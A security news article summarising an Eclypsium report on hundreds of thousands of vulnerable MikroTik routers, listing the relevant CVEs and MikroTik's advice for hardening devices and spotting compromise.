Threat actors often prey on vulnerable devices to break into targeted networks. With most employees working remotely, cybercriminals increased their hacking attempts targeting vulnerable commercial IoT devices like Wi-Fi routers. Recently, a security research report from Eclypsium revealed that over 300,000 IP addresses related to MikroTik devices were exposed to remotely exploitable security vulnerabilities.
“These devices are both powerful, [and] often highly vulnerable. This has made MikroTik devices a favorite among threat actors who have commandeered the devices for everything from DDoS attacks, command-and-control (C2), traffic tunneling, and more. An attacker could use well-known techniques and tools to potentially capture sensitive information, such as stealing MFA credentials from a remote user using SMS over Wi-Fi. As with previous attacks, enterprise traffic could be tunneled to another location or malicious content injected into valid traffic,” the researchers added,” the report said.
Based in Europe, MikroTik is a popular provider of routers, wireless ISP systems, hardware, and software for Internet connectivity worldwide.
Vulnerabilities in MikroTik Devices
MikroTik routers are an enticing target as more than two million devices are deployed globally, becoming a lucrative opportunity for attackers. According to the report, the most affected MikroTik devices are located in Russia, China, Brazil, Indonesia, Italy, Indonesia, and the U.S.
The flaws in MikroTik devices could expose users and enterprises to a wide variety of security risks. They can allow remote access to hackers to exploit and penetrate the network. The discovered security flaws include:
- CVE-2019-3977– MikroTik RouterOS insufficient validation of upgrade package origin, allowing a reset of all usernames and passwords
- CVE-2019-3978– MikroTik RouterOS insufficient protections of a critical resource, leading to cache poisoning
- CVE-2018-14847– MikroTik RouterOS directory traversal vulnerability in the WinBox interface
- CVE-2018-7445– MikroTik RouterOS SMB buffer overflow vulnerability
Besides, the researchers found 20,000 exposed MikroTik devices that injected cryptocurrency mining scripts into web pages that users visited. The ability for compromised routers to inject malicious content, tunnel, copy, or reroute traffic can be used in various highly damaging ways. DNS poisoning could redirect a remote worker’s connection to a malicious website or introduce a machine-in-the-middle,” the researchers added.
How to Protect MikroTik Devices Against Exploitation
MikroTik has listed measures to secure the devices.These include:
- Keep your MikroTik device up to date with regular upgrades.
- Do not open access to your device from the internet site to everyone. If you need remote access, only open a secure VPN service, like IPsec.
- Use a strong password, and even if you do, change it now!
- Do not assume your local network can be trusted. Malware can attempt to connect to your router if you have a weak password or no password.
- Inspect your RouterOS configuration for unknown settings, including:
- System -> Scheduler rules that execute a Fetch script. Remove these.
- IP -> Socks proxy. If you don’t use this feature or don’t know what it does, it must be disabled.
- L2TP client named “lvpn” or any L2TP client that you don’t recognize.
- Input firewall rule that allows access for port 5678.
- Block domains and tunnel endpoints associated with the Meris botnet.